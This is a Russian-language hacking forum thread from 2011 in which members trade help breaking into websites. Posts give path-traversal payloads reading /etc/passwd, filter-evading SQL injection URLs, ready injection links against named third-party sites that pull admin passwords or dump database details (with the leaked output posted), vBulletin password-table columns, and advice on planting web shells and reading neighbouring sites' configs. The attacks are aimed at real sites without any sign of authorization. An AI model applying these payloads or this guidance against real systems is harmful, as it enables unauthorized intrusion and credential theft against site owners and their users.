Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Tazk2

    Tazk2 New Member

    Joined:
    7 Jan 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    пацаны это инклюд?
    Fatal error: require() [function.require]: Failed opening required 'articles/../../../../../../../../../etc/php.ini/text.htm' (include_path='.:/usr/local/share/pear') in /pub/home/teplotex/htdocs/fedorov/warlib/index.php on line 115
     
  2. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Да, попробуй так ../../../../../../../../../../../../../etc/passwd%00
     
  3. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    ,...
     
    #16283 boortyhuhtyu, 8 Mar 2011
    Last edited: 2 Jan 2012
  4. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Взято с HackZone.RU - Больше про XSS
     
  5. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    Не могу разобратся. Значит запрос к базе такой

    $dbb=mysql_query("select * from zas where id='{$_GET['id']}'");
    $dbb=mysql_fetch_array($dbb);

    получаетса id это int, и при запросе
    http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,2,3/*'
    выводитса 2...
    но если делаю запрос
    http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,user(),3/*'
    то выдает Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in Z:\home\test1.ru\www\index.php on line ...
    как правильно сделать?
     
  6. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    попробуй

    http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'
    http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,/*!user()*/,3/*'


    Загружаю шелл в профайл админа cms Phorum, оказывается записывает файл в бд, как сделать исполнение кода? (http://127.0.0.1/file.php?0,file=1,filename=shell.php)
     
    #16286 noviyuser, 9 Mar 2011
    Last edited: 9 Mar 2011
  7. asql

    asql New Member

    Joined:
    19 Feb 2011
    Messages:
    32
    Likes Received:
    0
    Reputations:
    -3
    помогло...

    Возможно ли вскрыть такое?)
    http://www.luman.lg.ua/content.php?type=about_0400'
     
    #16287 asql, 9 Mar 2011
    Last edited: 9 Mar 2011
  8. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    http://www.luman.lg.ua/strelby.php?title=%CF%F3%EB%E8+%22%CB%FE%EC%E0%ED%22+FT-0%2C68&id=70+and+1=0+union+select+1,2,3,4,5,6,7,8,pass+from+adm_user

    пробелы необходимо убрать
     
    1 person likes this.
  9. DieWithMe

    DieWithMe New Member

    Joined:
    25 Feb 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Подкиньте уязвимостей по phpbb 3.0.2...
    Из тех что есть в этой темке большинство подразумевает наличие уязвимых модов либо права админа... У меня нет возможности даже зарегистрироваться(регистрация там только по подтверждению админом), а из модов, насколько я понял, только некие arcade и tosviolation.
     
  10. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    281
    Likes Received:
    144
    Reputations:
    36
    Не думал, что когда-то буду сюда писать...но))

    _http://www.nordiz.ru/tovar.php?tovar_id=2395
    Тут только посимвольно можно вытаскивать?)
     
  11. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ВНЕЗАПНО!111

    http://www.nordiz.ru/news.php?newsid=119+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--+
     
    1 person likes this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    да ,
    database version: 5.1.41-log
    database user: [email protected]
    database name: hand_nordis
     
  13. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    281
    Likes Received:
    144
    Reputations:
    36
    мда, скульмап по 1 символу в 1.5 минуты тащит, олоооо
     
  14. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    какая по умолчанию таблица vbulletin где храняться пользователи? и название колонок если можно
     
  15. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Вот, полезный списочек ;) http://itdefence.ru/dbitems/

    Code:
    [B]Table:[/B] user
    [B]Columns:[/B]
    userid
    usergroupid
    username
    password
    email
    
     
    1 person likes this.
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    как можно определить жумлу к какому сайта относится кроме таблиц jos_session и jos_content и файла configuration.php (на самом деле только доступ к таблицам)?
     
  17. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Помогите, плз
    Имею пхп-инъек..
    Вытащил config.php - получил данные к mysql, но host:localhost

    Вопрос: как можно узнать mysql.server???

    спасибо​
     
  18. baobabeng

    baobabeng Member

    Joined:
    2 Mar 2011
    Messages:
    35
    Likes Received:
    10
    Reputations:
    0
    попробуй в качестве хоста указать домен этого сайта, если не прокатит, то удалённое подключение запрещено, придётся заливать шелл, либо ещё что..
     
  19. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    пробовал, не выходит

    А в /etc/passwd можно откопать имя пользователя???
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    данный файл носит больше информационную нагрузку..имена пользователей системы ты там найдешь...но это тебе не поможет...попробуй подключится к базе айпи_адресс_сервера:3306 (но скорее всего не получится, как тебе уже говорили), посмотри на 2ип.ру какие еще сайты есть на серванте, попробуй у соседей почитать конфиги..может где и есть бейсик авторизация в админку..
     
Thread Status:
Not open for further replies.